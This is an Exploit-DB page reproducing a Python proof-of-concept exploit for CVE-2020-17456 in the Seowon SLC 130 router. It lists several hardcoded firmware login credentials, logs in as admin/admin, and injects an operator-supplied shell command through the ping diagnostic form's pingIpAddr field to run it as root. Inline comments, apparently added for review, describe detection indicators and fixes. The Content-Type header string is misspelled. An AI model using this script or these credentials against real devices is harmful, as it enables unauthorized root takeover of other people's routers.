Seowon SlC 130 Router – Remote Code Execution

  • 作者: maj0rmil4d
    日期: 2020-08-21
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/48759/
  • # Exploit Title: Seowon SlC 130 Router - Remote Code Execution
    # Author: maj0rmil4d - Ali Jalalat
    # Author website: https://secureguy.ir
    # Date: 2020-08-20
    # Vendor Homepage: seowonintech.co.kr
    # Software Link: http://www.seowonintech.co.kr/en/product/detail.asp?num=150&big_kind=B05&middle_kind=B05_29
    # CVE: CVE-2020-17456
    # Version: Lync:Mac firmware 1.0.1, likely earlier versions
    # Tested on: Windows 10 - Parrot sec
    
    # Description:
    # A user can run arbitrary commands on the router as root.
    # Because the firmware already ships with hardcoded credentials, the exploit is easy to trigger.
    
    # credentials : 
    # user => VIP
    # pwd => V!P83869000
    
    # user => Root
    # pwd => PWDd0N~WH*4G#DN
    
    # user => root
    # pwd => gksrmf28
    
    # user => admin
    # pwd => admin
    # 
    
    # A write-up can be found at:
    # https://maj0rmil4d.github.io/Seowon-SlC-130-And-SLR-120S-Exploit/
    
    import requests
    import sys
    
    # Proof-of-concept flow: log in to the router's web UI, then submit the
    # ping diagnostic form with a command appended to the address field.
    #
    # Base URL of the web interface (first CLI argument). It is concatenated
    # directly with the CGI paths below, so it has to carry the scheme.
    host = sys.argv[1]
    
    # One Session for both requests, so any cookie set by login.cgi is sent
    # again with the diagnostic request.
    session = requests.Session()
    
    # Static browser-like headers, reused for both POSTs.
    # NOTE(review): Origin and Referer are pinned to 192.168.1.1 whatever
    # `host` is, and the Content-Type string is the literal shown here. For
    # log review, a mismatch between these headers and the requested host on
    # the two CGI paths below is a possible indicator of this script —
    # confirm against real traffic before relying on it.
    header = { 
    
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0",
    "Accept": "text/html,application/xhtml+xml,application/xml;q:0.9,image/webp,*/*;q:0.8",
    "Accept-Language": "en-US,en;q:0.5",
    "Accept-Encoding": "gzip, deflate",
    "Content-Type": "pplication/x-www-form-urlencoded",
    "Content-Length": "132",
    "Origin": "http://192.168.1.1",
    "Connection": "close",
    "Referer": "http://192.168.1.1/",
    "Upgrade-Insecure-Requests": "1"
    }
    
    
    
    # Login form fields. The user/password pair is the admin/admin entry from
    # the credential list in the header comment. expires, browserTime and
    # currentTime are fixed literals, not computed at run time.
    datas = {
    	
    	"Command":"Submit",
    	"expires":"Wed%2C+12+Aug+2020+15%3A20%3A05+GMT",
    	"browserTime":"081119502020",
    	"currentTime":"1597159205",
    	"user":"admin",
    	"password":"admin"
    }
    
    
    # Authenticate. The response is discarded, so a rejected login is not
    # detected at this point.
    
    session.post(host+"/cgi-bin/login.cgi" , headers=header , data = datas)
    
    # Command injection through the ping diagnostic form.
    
    # Operator-supplied string (second CLI argument) that is appended to the
    # ping address field below.
    cmd = sys.argv[2]
    
    # Diagnostic form fields. pingIpAddr is a ';' followed by `cmd`; the
    # encode/decode round trip on ';' leaves the character unchanged.
    # The advisory header states the result is command execution as root,
    # which suggests the firmware places this field into a shell command
    # without validation — inferred from the PoC, not shown in this file.
    # Defensive takeaways: the handler should accept only a valid IP address
    # or hostname and pass it to ping as a separate argument, not through a
    # shell; for detection, review POSTs to /cgi-bin/system_log.cgi with
    # Command=Diagnostic whose pingIpAddr holds anything other than an
    # address, and keep the management interface off untrusted networks.
    rce_data = {
    	
    	"Command":"Diagnostic",
    	"traceMode":"ping",
    	"reportIpOnly":"",
    	"pingIpAddr":";".encode("ISO-8859-1").decode()+cmd,
    	"pingPktSize":"56",
    	"pingTimeout":"30",
    	"pingCount":"4",
    	"maxTTLCnt":"30",
    	"queriesCnt":"3",
    	"reportIpOnlyCheckbox":"on",
    	"btnApply":"Apply",
    	"T":"1597160664082"
    }
    
    # Submit the diagnostic form on the same session as the login.
    rce = session.post(host+"/cgi-bin/system_log.cgi" , headers=header , data = rce_data)
    
    # Pulls one line out of the response body: the text after the first '!',
    # then after the second '[', cut at the first newline. This depends on an
    # exact page layout and raises IndexError when the response differs
    # (for example if the login above did not succeed).
    print("one line out put of ur command => " + rce.text.split('!')[1].split('[')[2].split("\n")[0])